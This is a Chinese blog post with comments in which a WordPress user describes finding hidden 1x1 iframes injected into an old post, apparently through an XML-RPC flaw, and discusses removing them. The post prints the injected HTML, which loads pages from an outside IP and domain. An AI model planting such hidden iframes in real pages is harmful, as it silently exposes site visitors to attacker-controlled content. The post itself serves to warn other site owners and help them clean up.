sed /sshd/p -n /var/log/auth.log > /log/sshd.log » 21 days ago
晚上打开blog首页时感觉相当卡,以为是firefox又在吃内存了,可每次开都卡就奇怪了,打开firebug一查,居然在打开首页时载入了俩个php文件,看文件名是wp-stats.php,以自己根本就没用过这个插件,再一看吓一跳,居然这文件是来自www.wp-stats-php.info和61.132.75.71的,还是放在俩个iframe里,回想一下自己的blog几乎都是自己一个字一个字码上的,就算转贴也不可能转到这样的代码啊。
打开首页原文件一查,居然是出去年十月份的一篇文章的最后。自己可从没在文章里加过广告之类的附加代码,到底是如何而来的。访问61.132.75.71无法打开,再访问www.wp-stats-php.info页面只显示”asasasa”,要不是61.132.75.71无法访问造面blog首页载入变慢估计我到死也想不到自己的blog被人搞进这么恶心的东西。
上网找答案,发现出这情况的还不只我一个:
看来wp确实还存在着这么个不小的漏洞,这也不能怪我没有及时升级版本,2.3.1也有这情况出现。
而据说这事的始作俑者还是中国人,真不晓得该自豪还是悲哀。
目前还不知道有什么好的方法来解决,看来也只能看到一个删除一个了。
Update:忘了,把那段代码贴一下。
<!– Traffic Statistics –><br />
<iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe><br />
<!– End Traffic Statistics –><!– Traffic Statistics –> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!– End Traffic Statistics –></p>
RSS feed for comments on this post. TrackBack URL
Related Articles
Fresh Articles List
Popular Articles List
Most commented user
Oldies, but Goodies!
Popular Tags
Monthly Archives
iHao Friends
Site Meta
Comment by Henry Zeng — 02/01/2008 @ 9:35 am
你好!
我也被同样的木马注入WP了,并且在皮肤的源代码中并没有找到相关代码 请问是在哪里删除那段恶意代码?
谢谢!
Comment by iHao — 02/01/2008 @ 10:35 am
@Henry Zeng
恶意代码不在模板文件中,而是在文章内容中,到目前我的blog也只发现一篇文章被写入了这段代码,至于怎么删除的话,不知道这样可不可行,进入phpmyadmin,将wordpress数据库导出为文本文件,再用编辑器打开查找类似于我文后所附的那段代码,这样估计删得比较干净,只在页面中查看内容不容易找到,因为这俩个框架本身好像没有内容。
Comment by Jerry — 02/05/2008 @ 10:05 pm
最新更新的WORDPRESS 2.3.3版FIX了一个通过XML-RPC修改文章内容的FLAW,估计就是元凶~
Comment by Yixin — 02/10/2008 @ 12:47 pm
赶快升级吧,新版WP已经出来了!
Comment by iHao — 02/10/2008 @ 10:17 pm
谢谢Jerry和YiXin的提醒,不过wordpress不太想升级了,过段时间准备换到habari平台下试试,如果那时还有时间写blog的话.呵呵:-)
Pingback by 排毒养颜 at 论语·尧曰 - 积累知识,胜过积蓄金银 — 05/07/2008 @ 6:26 am
[…] WordPress被注入?还是见鬼了! […]